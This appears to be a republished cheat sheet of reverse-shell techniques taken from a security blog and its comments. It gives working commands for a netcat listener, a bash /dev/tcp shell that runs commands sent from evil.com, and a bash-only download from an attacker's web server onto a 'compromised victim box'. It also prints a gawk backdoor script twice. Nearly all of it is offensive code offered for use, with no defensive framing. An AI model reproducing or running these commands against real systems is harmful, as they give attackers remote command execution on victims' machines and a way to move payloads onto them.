============================================ www.techgaun.com Reverse shell examples from http://www.gnucitizen.org/blog/reverse-shell-with-bash/ including those from comments www.techgaun.com ============================================ Although netcat is very useful, and you may have to use it in most cases, here is a simple technique which emulates what netcat does but it relies on bash only. Let’s see how. In step one we start a listening service on our box. We can use netcat, or whatever you might have at hand. $ nc -l -p 8080 -vvv On the target we have to perform some bash-fu. We will create a new descriptor which is assigned to a network node. Then we will read and write to that descriptor. $ exec 5<>/dev/tcp/evil.com/8080 $ cat <&5 | while read line; do $line 2>&5 >&5; done ------------- Transfer a file using HTTP: Say you have compromised a victim box and want to transfer a file to the victim. 1. Put the file in the web root of the attacker box (I’m thinking of the web server in backtrack. 2. Start up the web server on the attacker box 3. On the victim box do: (echo -e "GET /filename_you_are_moving HTTP/0.9\r\n\r\n" \ 1>&3 & cat 0<&3) 3 /dev/tcp/AttackerIP/80 \ | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; \ do read i; done; cat) > local_filename Credit where credit is due: http://www.pebble.org.uk/linux/bashbrowser ------------- Reverse shell in gawk #!/usr/bin/gawk -f #!/usr/bin/gawk -f BEGIN { Port = 8080 Prompt = "bkd> " Service = "/inet/tcp/" Port "/0/0" while (1) { do { printf Prompt |& Service Service |& getline cmd if (cmd) { while ((cmd |& getline) > 0) print $0 |& Service close(cmd) } } while (cmd != "exit") close(Service) } } macuberg BEGIN { Port = 8080 Prompt = "bkd> " Service = "/inet/tcp/" Port "/0/0" while (1) { do { printf Prompt |& Service Service |& getline cmd if (cmd) { while ((cmd |& getline) > 0) print $0 |& Service close(cmd) } } while (cmd != "exit") close(Service) } } Credits to all original authors (pdp & macubergeek) www.techgaun.com